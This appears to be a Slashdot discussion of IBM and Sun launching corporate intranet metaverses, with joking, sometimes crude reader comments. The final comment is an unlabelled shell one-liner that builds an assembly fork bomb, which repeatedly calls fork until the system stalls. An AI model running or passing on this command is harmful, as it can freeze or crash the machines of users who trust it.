IBM and Sun Launch Intranet Metaverses
wjamesau writes "Sun and IBM have launched intranet metaverses designed for business and built to work behind their corporate firewalls, so their worldwide employees can use them to collaborate together. Most interesting to game developers, IBM (which also runs a private, no public access Second Life island as a development lab) created their intranet world from the 3D Torque engine from Garage Games. Will the metaverse actually be thousands of gated community metaverses?"
This is the worst fucking idea ever.
Will the metaverse actually be thousands of gated community metaverses?
No, that's just silly. A metaverse will be a single line of the first metapoem.
They've leveraged forces to combine synergies to collaboratively multitask new paradigms for shitcanning their entire US work force.
Do you even lift?
These aren't the 'roids you're looking for.
Not really. They ARE going to play games on company time. At least this way the employer can sort of put a cap on it. ( And freeze your avatar when you are behind on a deadline )
Metaverses are an important paradigm in the post Web 2.0 era, taking advantage of the wisdom of crowds and allowing open sourcing of ideas. And furries can yiff in them too.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;